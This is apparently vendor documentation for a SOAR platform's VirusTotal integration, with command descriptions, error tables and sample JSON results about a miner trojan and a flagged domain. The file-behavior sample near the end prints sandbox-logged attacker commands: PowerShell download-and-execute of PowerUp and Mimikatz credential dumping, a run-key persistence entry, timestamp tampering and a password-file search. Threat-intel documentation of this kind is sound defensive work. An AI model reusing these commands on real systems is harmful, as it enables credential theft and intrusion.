"VIPRE": {
"category": "undetected",
"engine_name": "VIPRE",
"engine_version": "*****",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
}
},
"type": "analysis",
"id": "*****",
"links": {
"self": "https://www.virustotal.com/api/v3/analyses/***"
}
}
}Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"FileNames": [
"***.exe"
],
"SHA256s": [
"*****"
],
"SHA1s": [
"*****"
],
"MD5s": [
"*****"
],
"FileIDs": [
"*****"
],
"Statuses": [
"completed"
],
"HarmlessCounts": [
0
],
"MaliciousCounts": [
1
],
"SuspiciousCounts": [
2
],
"UndetectedCounts": [
69
],
"TypeUnsupportedCounts": [
5
]
}Provides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
No Sample DataError Handling
If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Detonate Files failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 404. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: File ID Not Found. |
Error Sample Data Detonate Files failed. Status Code: 404. Message: File ID Not Found. |
Get Domain Relationships
Retrieves objects related to the specified internet domains.
Input
Input Parameter | Required/Optional | Description | Example |
Domains | Required | The domains to retrieve related objects. |
JSON
|
Relationship | Required | The relationship between the specified domains and the related objects to return. Note: Relationship options labeled with “(Enterprise)” (e.g. Caa_records (Enterprise)) can only be used with a premium VirusTotal API connection. | Communicating_files |
Output
The primary response data from the API request.
D3 enriches the raw data from the original VirusTotal API response by adding the domain field to indicate your input domain.
SAMPLE DATA
{
"meta": {
"count": 200,
"cursor": "STEwCi4="
},
"data": [
{
"attributes": {
"type_description": "Win32 EXE",
"tlsh": "*****",
"vhash": "***\"***",
"trid": [
{
"file_type": "Win64 Executable (generic)",
"probability": 63.5
},
{
"file_type": "OS/2 Executable (generic)",
"probability": 12.2
},
{
"file_type": "Generic Win/DOS Executable",
"probability": 12
},
{
"file_type": "DOS Executable Generic",
"probability": 12
}
],
"signature_info": {
"description": " ",
"copyright": " ",
"internal name": "***.exe",
"file version": "*.*.*.*",
"original name": "***.exe"
},
"creation_date": 1625642073,
"names": [
"***.exe"
],
"dot_net_guids": {
"typelib_id": "*****",
"mvid": "*****"
},
"last_modification_date": 1625859995,
"type_tag": "peexe",
"times_submitted": 1,
"total_votes": {
"harmless": 0,
"malicious": 0
},
"size": 49664,
"popular_threat_classification": {
"suggested_threat_label": "trojan.msil/kryptik",
"popular_threat_category": [
{
"count": 5,
"value": "trojan"
},
{
"count": 3,
"value": "miner"
}
],
"popular_threat_name": [
{
"count": 4,
"value": "msil"
},
{
"count": 3,
"value": "kryptik"
},
{
"count": 2,
"value": "filerepmalware"
}
]
},
"authentihash": "*****",
"last_submission_date": 1625769633,
"meaningful_name": "***.exe",
"sandbox_verdicts": {
"C2AE": {
"category": "malicious",
"confidence": 50,
"sandbox_name": "C2AE",
"malware_classification": [
"MALWARE"
],
"malware_names": [
"XMRminer",
"CryptoCurrencyMiner"
]
}
},
"sha256": "*****",
"type_extension": "exe",
"tags": [
"64bits",
"peexe",
"runtime-modules"
],
"last_analysis_date": 1625788864,
"unique_sources": 1,
"first_submission_date": 1625769633,
"sha1": "*****",
"ssdeep": "*****",
"packers": {
"PEiD": "Microsoft Visual C++ vx.x DLL"
},
"md5": "*****",
"dot_net_assembly": {
"assembly_name": "***.exe",
"tables_rows_map_log": "464465444444",
"type_definition_list": [
{
"type_definitions": [
"Assembly",
"MethodInfo",
"MethodBase"
],
"namespace": "System.Reflection"
},
{
"type_definitions": [
"CompilationRelaxationsAttribute",
"RuntimeCompatibilityAttribute"
],
"namespace": "System.Runtime.CompilerServices"
},
{
"type_definitions": [
"Enumerable"
],
"namespace": "System.Linq"
},
{
"type_definitions": [
"Object",
"Int32",
"Type",
"Exception"
],
"namespace": "System"
},
{
"type_definitions": [
"GuidAttribute"
],
"namespace": "System.Runtime.InteropServices"
},
{
"type_definitions": [
"Thread"
],
"namespace": "System.Threading"
},
{
"type_definitions": [
"IEnumerable`1"
],
"namespace": "System.Collections.Generic"
},
{
"type_definitions": [
"ResourceManager"
],
"namespace": "System.Resources"
}
],
"external_assemblies": {
"mscorlib": {
"version": "*.*.*.*"
},
"System.Core": {
"version": "*.*.*.*"
}
},
"tables_rows_map": "*****",
"manifest_resource": [
"*****.*****"
],
"streams": {
"#~": {
"chi2": ***.***,
"size": 424,
"entropy": ***.***,
"md5": "*****"
},
"#Strings": {
"chi2": ***.***,
"size": 552,
"entropy": ***.***,
"md5": "*****"
},
"#US": {
"chi2": ***.***,
"size": 148,
"entropy": ***.***,
"md5": "*****"
},
"#GUID": {
"chi2": ***,
"size": 16,
"entropy": ***,
"md5": "*****"
},
"#Blob": {
"chi2": ***.***,
"size": 204,
"entropy": ***.***,
"md5": "*****"
}
},
"tables_present": 12,
"clr_version": "v*.*.*",
"assembly_data": {
"majorversion": 0,
"minorversion": 0,
"hashalgid": *****,
"flags_text": "afPA_None",
"buildnumber": 0,
"flags": 0,
"revisionnumber": 0,
"name": "mine"
},
"tables_present_map": "90908021447L",
"clr_meta_version": "*.*"
},
"pe_info": {
"resource_details": [
{
"lang": "NEUTRAL",
"entropy": ***.***,
"chi2": ***.***,
"filetype": "Data",
"sha256": "*****",
"type": "RT_VERSION"
},
{
"lang": "NEUTRAL",
"entropy": ***.***,
"chi2": ***.***,
"filetype": "Data",
"sha256": "*****",
"type": "RT_MANIFEST"
}
],
"resource_types": {
"RT_MANIFEST": 1,
"RT_VERSION": 1
},
"timestamp": 1625642073,
"resource_langs": {
"NEUTRAL": 2
},
"machine_type": 34404,
"sections": [
{
"name": ".text",
"chi2": ***.***,
"virtual_address": ***,
"entropy": ***.***,
"raw_size": 47616,
"flags": "rx",
"virtual_size": 47536,
"md5": "*****"
},
{
"name": ".rsrc",
"chi2": ***.***,
"virtual_address": *****,
"entropy": ***.***,
"raw_size": 1536,
"flags": "r",
"virtual_size": 1232,
"md5": "*****"
}
]
},
"magic": "PE32+ executable for MS Windows (GUI)",
"last_analysis_stats": {
"harmless": 0,
"type-unsupported": 5,
"suspicious": 0,
"confirmed-timeout": 1,
"timeout": 0,
"failure": 0,
"malicious": 22,
"undetected": 47
},
"last_analysis_results": {
"Bkav": {
"category": "undetected",
"engine_name": "Bkav",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Lionic": {
"category": "undetected",
"engine_name": "Lionic",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Elastic": {
"category": "malicious",
"engine_name": "Elastic",
"engine_version": "*.*.*",
"result": "malicious (high confidence)",
"method": "blacklist",
"engine_update": "20210706"
},
"MicroWorld-eScan": {
"category": "undetected",
"engine_name": "MicroWorld-eScan",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"FireEye": {
"category": "malicious",
"engine_name": "FireEye",
"engine_version": "*.*.*.*",
"result": "Generic.mg.3e9fc2e8c10879eb",
"method": "blacklist",
"engine_update": "20210708"
},
"CAT-QuickHeal": {
"category": "undetected",
"engine_name": "CAT-QuickHeal",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"ALYac": {
"category": "undetected",
"engine_name": "ALYac",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Cylance": {
"category": "malicious",
"engine_name": "Cylance",
"engine_version": "*.*.*.*",
"result": "Unsafe",
"method": "blacklist",
"engine_update": "20210709"
},
"VIPRE": {
"category": "undetected",
"engine_name": "VIPRE",
"engine_version": "*****",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
}
},
"reputation": 0
},
"type": "file",
"id": "*****",
"links": {
"self": "https://www.virustotal.com/api/v3/files/***"
}
}
],
"links": {
"self": "https://www.virustotal.com/api/v3/domains/*****.*****.***/communicating_files?limit=10",
"next": "https://www.virustotal.com/api/v3/domains/*****.*****.***/communicating_files?cursor=STEwCi4%3D&limit=10"
}
}The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.
Same as Raw Data, D3 enriches the context data from the original VirusTotal API response by adding the domain field to indicate your input domain.
It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.
SAMPLE DATA
{
"meta": {
"count": 200,
"cursor": "STEwCi4="
},
"data": [
{
"attributes": {
"type_description": "Win32 EXE",
"tlsh": "*****",
"vhash": "***\"***",
"trid": [
{
"file_type": "Win64 Executable (generic)",
"probability": 63.5
},
{
"file_type": "OS/2 Executable (generic)",
"probability": 12.2
},
{
"file_type": "Generic Win/DOS Executable",
"probability": 12
},
{
"file_type": "DOS Executable Generic",
"probability": 12
}
],
"signature_info": {
"description": " ",
"copyright": " ",
"internal name": "***.exe",
"file version": "*.*.*.*",
"original name": "***.exe"
},
"creation_date": 1625642073,
"names": [
"***.exe"
],
"dot_net_guids": {
"typelib_id": "*****",
"mvid": "*****"
},
"last_modification_date": 1625859995,
"type_tag": "peexe",
"times_submitted": 1,
"total_votes": {
"harmless": 0,
"malicious": 0
},
"size": 49664,
"popular_threat_classification": {
"suggested_threat_label": "trojan.msil/kryptik",
"popular_threat_category": [
{
"count": 5,
"value": "trojan"
},
{
"count": 3,
"value": "miner"
}
],
"popular_threat_name": [
{
"count": 4,
"value": "msil"
},
{
"count": 3,
"value": "kryptik"
},
{
"count": 2,
"value": "filerepmalware"
}
]
},
"authentihash": "*****",
"last_submission_date": 1625769633,
"meaningful_name": "***.exe",
"sandbox_verdicts": {
"C2AE": {
"category": "malicious",
"confidence": 50,
"sandbox_name": "C2AE",
"malware_classification": [
"MALWARE"
],
"malware_names": [
"XMRminer",
"CryptoCurrencyMiner"
]
}
},
"sha256": "*****",
"type_extension": "exe",
"tags": [
"64bits",
"peexe",
"runtime-modules"
],
"last_analysis_date": 1625788864,
"unique_sources": 1,
"first_submission_date": 1625769633,
"sha1": "*****",
"ssdeep": "*****",
"packers": {
"PEiD": "Microsoft Visual C++ vx.x DLL"
},
"md5": "*****",
"dot_net_assembly": {
"assembly_name": "***.exe",
"tables_rows_map_log": "464465444444",
"type_definition_list": [
{
"type_definitions": [
"Assembly",
"MethodInfo",
"MethodBase"
],
"namespace": "System.Reflection"
},
{
"type_definitions": [
"CompilationRelaxationsAttribute",
"RuntimeCompatibilityAttribute"
],
"namespace": "System.Runtime.CompilerServices"
},
{
"type_definitions": [
"Enumerable"
],
"namespace": "System.Linq"
},
{
"type_definitions": [
"Object",
"Int32",
"Type",
"Exception"
],
"namespace": "System"
},
{
"type_definitions": [
"GuidAttribute"
],
"namespace": "System.Runtime.InteropServices"
},
{
"type_definitions": [
"Thread"
],
"namespace": "System.Threading"
},
{
"type_definitions": [
"IEnumerable`1"
],
"namespace": "System.Collections.Generic"
},
{
"type_definitions": [
"ResourceManager"
],
"namespace": "System.Resources"
}
],
"external_assemblies": {
"mscorlib": {
"version": "*.*.*.*"
},
"System.Core": {
"version": "*.*.*.*"
}
},
"tables_rows_map": "*****",
"manifest_resource": [
"*****.*****"
],
"streams": {
"#~": {
"chi2": ***.***,
"size": 424,
"entropy": ***.***,
"md5": "*****"
},
"#Strings": {
"chi2": ***.***,
"size": 552,
"entropy": ***.***,
"md5": "*****"
},
"#US": {
"chi2": ***.***,
"size": 148,
"entropy": ***.***,
"md5": "*****"
},
"#GUID": {
"chi2": 240,
"size": 16,
"entropy": 4,
"md5": "*****"
},
"#Blob": {
"chi2": ***.***,
"size": 204,
"entropy": ***.***,
"md5": "*****"
}
},
"tables_present": 12,
"clr_version": "v*.*.*",
"assembly_data": {
"majorversion": 0,
"minorversion": 0,
"hashalgid": *****,
"flags_text": "afPA_None",
"buildnumber": 0,
"flags": 0,
"revisionnumber": 0,
"name": "mine"
},
"tables_present_map": "*****",
"clr_meta_version": "*.*"
},
"pe_info": {
"resource_details": [
{
"lang": "NEUTRAL",
"entropy": ***.***,
"chi2": ***.***,
"filetype": "Data",
"sha256": "*****",
"type": "RT_VERSION"
},
{
"lang": "NEUTRAL",
"entropy": ***.***,
"chi2": ***.***,
"filetype": "Data",
"sha256": "*****",
"type": "RT_MANIFEST"
}
],
"resource_types": {
"RT_MANIFEST": 1,
"RT_VERSION": 1
},
"timestamp": 1625642073,
"resource_langs": {
"NEUTRAL": 2
},
"machine_type": 34404,
"sections": [
{
"name": ".text",
"chi2": ***.***,
"virtual_address": *****,
"entropy": ***.***,
"raw_size": 47616,
"flags": "rx",
"virtual_size": 47536,
"md5": "*****"
},
{
"name": ".rsrc",
"chi2": ***.***,
"virtual_address": 57344,
"entropy": ***.***,
"raw_size": 1536,
"flags": "r",
"virtual_size": 1232,
"md5": "*****"
}
]
},
"magic": "PE32+ executable for MS Windows (GUI)",
"last_analysis_stats": {
"harmless": 0,
"type-unsupported": 5,
"suspicious": 0,
"confirmed-timeout": 1,
"timeout": 0,
"failure": 0,
"malicious": 22,
"undetected": 47
},
"last_analysis_results": {
"Bkav": {
"category": "undetected",
"engine_name": "Bkav",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Lionic": {
"category": "undetected",
"engine_name": "Lionic",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Elastic": {
"category": "malicious",
"engine_name": "Elastic",
"engine_version": "*.*.*",
"result": "malicious (high confidence)",
"method": "blacklist",
"engine_update": "20210706"
},
"MicroWorld-eScan": {
"category": "undetected",
"engine_name": "MicroWorld-eScan",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"FireEye": {
"category": "malicious",
"engine_name": "FireEye",
"engine_version": "*.*.*.*",
"result": "Generic.mg.3e9fc2e8c10879eb",
"method": "blacklist",
"engine_update": "20210708"
},
"CAT-QuickHeal": {
"category": "undetected",
"engine_name": "CAT-QuickHeal",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"ALYac": {
"category": "undetected",
"engine_name": "ALYac",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Cylance": {
"category": "malicious",
"engine_name": "Cylance",
"engine_version": "*.*.*.*",
"result": "Unsafe",
"method": "blacklist",
"engine_update": "20210709"
},
"VIPRE": {
"category": "undetected",
"engine_name": "VIPRE",
"engine_version": "*****",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
}
},
"reputation": 0
},
"type": "file",
"id": "*****",
"links": {
"self": "https://www.virustotal.com/api/v3/files/***"
}
}
],
"links": {
"self": "https://www.virustotal.com/api/v3/domains/*****.*****.***/communicating_files?limit=10",
"next": "https://www.virustotal.com/api/v3/domains/*****.*****.***/communicating_files?cursor=STEwCi4%3D&limit=10"
}
}Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"Domains": [
"*****.*****.***"
]
}Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.
The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.
The Failed state can be triggered by any of the following errors:
A connection issue with the integration
The API returned an error message
No response from the API
You can view more details about an error in the Error tab.
Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.
SAMPLE DATA
SuccessfulProvides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
No sample data
Error Handling
If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Get Domain Relationships failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 404. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Domain Not Found. |
Error Sample Data Get Domain Relationships failed. Status Code: 404. Message: Domain Not Found. |
Get Domain Reports
Retrieves information of specified Internet domains.
Input
Input Parameter | Required/Optional | Description | Example |
Domains | Required | The list of domains to return corresponding report information. |
JSON
|
Output
The primary response data from the API request.
SAMPLE DATA
{
"data": {
"attributes": {
"last_dns_records": [
{
"type": "A",
"value": "***.***.***.***",
"ttl": 60
},
{
"type": "CNAME",
"value": "*****",
"ttl": 60
},
{
"type": "A",
"value": "***.***.***.***",
"ttl": 60
},
{
"type": "A",
"value": "***.***.***.***",
"ttl": 60
}
],
"jarm": "*****",
"whois": "Creation Date: 2014-03-04T11:56:24Z\nDNSSEC: unsigned\nDomain Name: MINERGATE.COM\nDomain Status: clientDeleteProhibited https://***\nUpdated Date: 2022-02-28T16:49:24Z",
"last_https_certificate_date": 1589470203,
"tags": [],
"popularity_ranks": {
"Cisco Umbrella": {
"timestamp": 1661792287,
"rank": 329471
}
},
"last_dns_records_date": 1661766773,
"last_analysis_stats": {
"harmless": 75,
"malicious": 8,
"suspicious": 0,
"undetected": 11,
"timeout": 0
},
"creation_date": 1393934184,
"reputation": -1,
"registrar": "GoDaddy.com, LLC",
"last_analysis_results": {},
"last_update_date": 1646066964,
"last_modification_date": 1661792391,
"last_https_certificate": {},
"categories": {
"Sophos": "spyware and malware",
"BitDefender": "financial",
"Webroot": "Malware Sites",
"Comodo Valkyrie Verdict": "media sharing",
"Forcepoint ThreatSeeker": "information technology",
"alphaMountain.ai": "Malicious"
},
"total_votes": {
"harmless": 0,
"malicious": 1
}
},
"type": "domain",
"id": "*****.*****.***",
"links": {
"self": "https://www.virustotal.com/api/v3/domains/*****.*****.***"
}
}
}The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.
It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.
SAMPLE DATA
{
"data": {
"attributes": {
"last_dns_records": [
{
"type": "A",
"value": "*.*.*.*",
"ttl": 60
},
{
"type": "CNAME",
"value": "*****",
"ttl": 60
},
{
"type": "A",
"value": "*.*.*.*",
"ttl": 60
},
{
"type": "A",
"value": "*.*.*.*",
"ttl": 60
}
],
"jarm": "*****",
"whois": "Creation Date: 2014-03-04T11:56:24Z\nDNSSEC: unsigned\nDomain Name: MINERGATE.COM\nDomain Status: clientDeleteProhibited https://icann.org/*****\nDomain Status: clientRenewProhibited https://icann.org/*****\nDomain Status: clientTransferProhibited https://icann.org/*****\nDomain Status: clientUpdateProhibited https://icann.org/*****\nName Server: NS-1476.AWSDNS-56.ORG\nName Server: NS-1810.AWSDNS-34.CO.UK\nName Server: NS-822.AWSDNS-38.NET\nName Server: NS-97.AWSDNS-12.COM\nRegistrar Abuse Contact Email: *****@*****.***\nRegistrar Abuse Contact Phone: *****\nRegistrar IANA ID: 146\nRegistrar URL: http://www.godaddy.com\nRegistrar WHOIS Server: whois.godaddy.com\nRegistrar: GoDaddy.com, LLC\nRegistry Domain ID: *****-VRSN\nRegistry Expiry Date: 2023-03-04T11:56:24Z\nUpdated Date: 2022-02-28T16:49:24Z",
"last_https_certificate_date": 1589470203,
"tags": [],
"popularity_ranks": {
"Cisco Umbrella": {
"timestamp": 1661792287,
"rank": 329471
}
},
"last_dns_records_date": 1661766773,
"last_analysis_stats": {
"harmless": 75,
"malicious": 8,
"suspicious": 0,
"undetected": 11,
"timeout": 0
},
"creation_date": 1393934184,
"reputation": -1,
"registrar": "GoDaddy.com, LLC",
"last_analysis_results": {},
"last_update_date": 1646066964,
"last_modification_date": 1661792391,
"last_https_certificate": {},
"categories": {
"Sophos": "spyware and malware",
"BitDefender": "financial",
"Webroot": "Malware Sites",
"Comodo Valkyrie Verdict": "media sharing",
"Forcepoint ThreatSeeker": "information technology",
"alphaMountain.ai": "Malicious"
},
"total_votes": {
"harmless": 0,
"malicious": 1
}
},
"type": "domain",
"id": "*****.*****.***",
"links": {
"self": "https://www.virustotal.com/api/v3/domains/*****.*****.***"
}
}
}Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"Domains": [
"*****.*****.***"
],
"Whois": [
"Admin City: Tempe\nAdmin Country: US\nAdmin Email: ***@***.com\nAdmin Organization: Domains By Proxy, LLC\nAdmin Postal Code: *****\nAdmin State/Province: Arizona\nCreation Date: 2014-03-04T06:56:24Z\nCreation Date: 2014-03-04T11:56:24Z\nDNSSEC: unsigned\nDomain Name: MINERGATE.COM\nDomain Status: clientDeleteProhibited http://www.icann.org/*****\nDomain Status: clientDeleteProhibited https://icann.org/*****\nDomain Status: clientRenewProhibited http://www.icann.org/*****\nDomain Status: clientRenewProhibited https://icann.org/*****\nDomain Status: clientTransferProhibited http://www.icann.org/*****\nDomain Status: clientTransferProhibited https://icann.org/*****\nDomain Status: clientUpdateProhibited http://www.icann.org/*****\nDomain Status: clientUpdateProhibited https://icann.org/*****\nName Server: NS-1476.AWSDNS-56.ORG\nName Server: NS-1810.AWSDNS-34.CO.UK\nName Server: NS-822.AWSDNS-38.NET\nName Server: NS-97.AWSDNS-12.COM\nRegistrant City: *****\nRegistrant Country: US\nRegistrant Email: *****@*****.***\nRegistrant Fax Ext: *****\nRegistrant Fax: *****\nRegistrant Name: *****\nRegistrant Organization: *****\nRegistrant Phone Ext: *****\nRegistrant Phone: *****\nRegistrant Postal Code: *****\nRegistrant State/Province: *****\nRegistrant Street: *****\nRegistrant Street: *****\nRegistrar Abuse Contact Email: *****@*****.***\nRegistrar Abuse Contact Phone: *****\nRegistrar Abuse Contact Phone: *****\nRegistrar IANA ID: 146\nRegistrar Registration Expiration Date: 2022-03-04T06:56:24Z\nRegistrar URL: http://www.godaddy.com\nRegistrar WHOIS Server: whois.godaddy.com\nRegistrar: GoDaddy.com, LLC\nRegistry Admin ID: Not Available From Registry\nRegistry Domain ID: *****-VRSN\nRegistry Expiry Date: 2022-03-04T11:56:24Z\nRegistry Registrant ID: Not Available From Registry\nRegistry Tech ID: Not Available From Registry\nTech City: Tempe\nTech Country: US\nTech Email: *****@*****.***\nTech Organization: Domains By Proxy, LLC\nTech Postal Code: *****\nTech State/Province: Arizona\nUpdated Date: 2021-02-27T06:33:38Z\nUpdated Date: 2021-02-27T13:33:38Z"
],
"HarmlessCounts": [
67
],
"MaliciousCounts": [
8
],
"SuspiciousCounts": [
1
],
"UndetectedCounts": [
9
],
"Reputations": [
-1
],
"Registrars": [
"GoDaddy.com, LLC"
],
"HarmlessVoteCounts": [
0
],
"MaliciousVoteCounts": [
1
]
}Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.
The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.
The Failed state can be triggered by any of the following errors:
A connection issue with the integration
The API returned an error message
No response from the API
You can view more details about an error in the Error tab.
Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.
SAMPLE DATA
SuccessfulProvides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
No sample data
Error Handling
If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Get Domain Reports failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 404. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Domain Not Found. |
Error Sample Data Get Domain Reports failed. Status Code: 404. Message: Domain Not Found. |
Get File Behavior Summaries
Retrieves summaries with behavioral information about the specified files.
Input
Input Parameter | Required/Optional | Description | Example |
File Hashes | Required | The file hash function values (SHA-256, SHA-1 or MD5) of the files to retrieve corresponding summaries. |
JSON
|
Output
The primary response data from the API request.
D3 enriches the raw data from the original VirusTotal API response by adding the file_hash field to indicate your input File Hashes.
SAMPLE DATA
{
"data": {
"processes_terminated": [
"\\***.exe",
"\\***\\v*.*\\***.exe",
"\\***.exe",
"\\***.exe",
"\\***.exe",
"2288 - \"C:\\Windows\\***\\***.exe\" add HKLM\\***\\***\\***\\***\\*** /v d3commander /d C:\\Windows\\***.exe /f",
"2472 - \"C:\\Windows\\***\\***.exe\" /fo csv",
"2564 - \"C:\\Windows\\***\\***\\v1.0\\***.exe\" -command $file=(gi c:\\windows\\***.exe.config);$date='01/03/2000 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date",
"2652 - \"C:\\Windows\\***\\***\\v1.0\\***.exe\" -exec bypass -command \"IEX (New-Object Net.WebClient).DownloadString('http://***.***.***.***/PowerUp.ps1'); Get-ServiceUnquoted \" >c:\\windows\\***.txt",
"2792 - C:\\Windows\\***\\***.exe",
"2840 - \"C:\\Windows\\***\\***.exe\" C:\\Windows\\***\\***\\***.log C:\\Windows\\***\\***\\CbsPersist_20200609143948.cab",
"2884 - \"C:\\Windows\\***\\***\\v1.0\\***.exe\" -exec bypass -command \"IEX (New-Object Net.WebClient).DownloadString('http://***.***.***.***/***.ps1'); Invoke-Mimikatz -DumpCreds \" >c:\\windows\\***.txt",
"2052 - \"C:\\Windows\\***\\***\\v1.0\\***.exe\" -exec bypass -command \"IEX (New-Object Net.WebClient).DownloadString('http://***.***.***.***/***.ps1'); Get-NetComputer\" >c:\\windows\\*.txt",
"2580 - \"C:\\Windows\\***\\***.exe\" query \"HKLM\\***\\***\\***\\***\\***\" /s",
"2984 - \"C:\\Windows\\***\\***.exe\" /c dir c:\\***\\***\\*password* /b /s /a-d",
"3068 - \"C:\\Program Files\\Windows Media Player\\wmpnetwk.exe\"",
"C:\\Windows\\***\\***.exe add HKLM\\***\\***\\***\\***\\*** /v d3commander /d C:\\Windows\\***.exe /f",
"C:\\Windows\\***\\***.exe query HKLM\\***\\***\\***\\***\\***/s",
"C:\\Windows\\***\\***.exe /c dir c:\\users\\administrator\\*password* /b /s /a-d",
"C:\\Windows\\***\\***\\v*.*\\***.exe -command $file=(gi c:\\windows\\***.exe.config);$date=01/03/2000 12:12 pm;$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date",
"C:\\Windows\\***\\***.exe /fo csv",
"C:\\Windows\\***\\***\\v*.*\\***.exe -exec bypass -command IEX (New-Object Net.WebClient).DownloadString('http://***.***.***.***/PowerUp.ps1'); Get-ServiceUnquoted >c:\\windows\\out1.txt",
"C:\\Windows\\***\\***\\v*.*\\***.exe -exec bypass -command IEX (New-Object Net.WebClient).DownloadString('http://***.***.***.***/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds >c:\\windows\\out2.txt"
],
"files_deleted": [
"C:\\***.***.***.***.***.tmt.ps1",
"C:\\***.***.***.***.***.wlq.psm1",
"C:\\***.***.***.***.***.bkz.ps1",
"C:\\***.***.***.***.***.50a.psm1"
],
"mutexes_created": [
"\\Sessions\\1\\***\\***\\***",
"\\Sessions\\1\\***\\***\\***",
"\\Sessions\\1\\***\\***\\***"
],
"files_opened": [],
"processes_created": [
"",
"\\***.exe",
"\\***.exe",
"\\***.exe",
"\\***\\***.exe",
"\\***\\v*.*\\***.exe",
"\\cmd.exe",
"C:\\Windows\\***\\***.exe add HKLM\\***\\***\\***\\***\\*** /v d3commander /d C:\\Windows\\commander.exe /f",
"C:\\Windows\\***\\***.exe /fo csv",
"C:\\Windows\\***\\***\\v1.0\\***.exe -command $file=(gi c:\\***\\***.exe.config);$date=01/03/2000 12:12 pm;$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date",
"C:\\Windows\\***\\***\\v1.0\\***.exe -exec bypass -command IEX (New-Object Net.WebClient).DownloadString('http://***.***.***.***/***.ps1'); Get-ServiceUnquoted >c:\\windows\\***.txt",
"C:\\Windows\\***\\***\\v1.0\\***.exe -exec bypass -command IEX (New-Object Net.WebClient).DownloadString('http://***.***.***.***/***.ps1'); Invoke-Mimikatz -DumpCreds >c:\\windows\\***.txt",
"C:\\Windows\\***\\***\\v1.0\\***.exe -exec bypass -command IEX (New-Object Net.WebClient).DownloadString('http://***.***.***.***/***.ps1'); Get-NetComputer >c:\\windows\\***.txt",
"C:\\Windows\\***\\***.exe query HKLM\\***\\***\\***\\***\\*** /s",
"C:\\Windows\\***\\***.exe /c dir c:\\***\\***\\*password* /b /s /a-d"
],
"registry_keys_set": [
{
"key": "\\Software\\***\\***\\***\\***\\***\\***",
"value": "*****"
},
{
"key": "\\Software\\***\\***\\***\\***\\***\\***",
"value": "*****"
},
{
"key": "\\Software\***\\***\\***\\***\\**",
"value": "*****"
}
],
"mutexes_opened": [
